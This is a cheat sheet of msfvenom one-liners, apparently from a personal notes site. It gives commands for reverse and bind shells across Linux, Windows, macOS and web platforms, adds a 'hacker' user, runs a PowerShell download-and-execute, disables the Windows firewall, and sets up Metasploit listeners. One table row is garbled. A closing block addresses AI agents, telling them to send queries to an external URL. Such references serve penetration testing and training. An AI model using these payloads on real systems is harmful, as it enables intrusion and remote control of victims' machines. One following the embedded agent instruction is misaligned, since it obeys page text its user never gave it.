# mSFVenom Cheatsheet ## MSFVenom Cheatsheet Single Page Cheatsheet for common MSF Venom One Liners\ Available in PDF, DOCX and Markdown format! *PDF and DOCX versions contain the payload size in bytes and a few more commands.* ### MSFVenom Cheatsheet | MSFVenom Payload Generation One-Liner | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------- | | `msfvenom -l payloads` | List available payloads | | `msfvenom -p PAYLOAD --list-options` | List payload options | | `msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IP` | Payload Encoding | | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf` | Linux Meterpreter reverse shell x86 multi stage | | `msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf` | Linux Meterpreter bind shell x86 multi stage | | `msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf` | Linux bind shell x64 single stage | | `msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf` | Linux reverse shell x64 single stage | | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe` | Windows Meterpreter reverse shell | | `msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe` | Windows Meterpreter http reverse shell | | `msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe` | Windows Meterpreter bind shell | | `msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe` | Windows CMD Multi Stage | | `msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe` | Windows CMD Single Stage | | `msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe` | Windows add user | | `msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho` | Mac Reverse Shell | | `msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho` | Mac Bind shell | | `msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py` | Python Shell | | `msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh` | BASH Shell | | `msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl` | PERL Shell | | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp` | ASP Meterpreter shell | | `msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp` | JSP Shell | | `msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war` | WAR Shell | | `msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php cat shell.php` | pbcopy && echo '?php ' | | `msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php` | Php Reverse Shell | | `msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')" -f python` | Windows Exec Nishang Powershell in python | | `msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x04\xA0"` | Bad characters shikata\_ga\_nai | | `msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0"` | Bad characters fnstenv\_mov | ### Multihandler Listener To get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse\_tcp payload, ``` msf>use exploit/multi/handler msf>set payload windows/meterpreter/reverse_tcp msf>set lhost msf>set lport msf> set ExitOnSession false msf>exploit -j ``` The -j option is to keep all the connected session in the background. ### Windows Bind Shell * create a shell bind on listen on port on current machine (to run on windows and after connect on port PORT) ```bash msfvenom -p windows/x64/shell_bind_tcp LHOST=0.0.0.0 LPORT=PORT -f exe > windowsbindshellPORT.exe ``` ```bash netsh advfirewall set allprofiles state off windowsbindshellPORT.exe ``` On attacker machine ```bash nc iptarget PORT ``` ### References * * * * Windows Macro - --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/tools/msfvenom-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.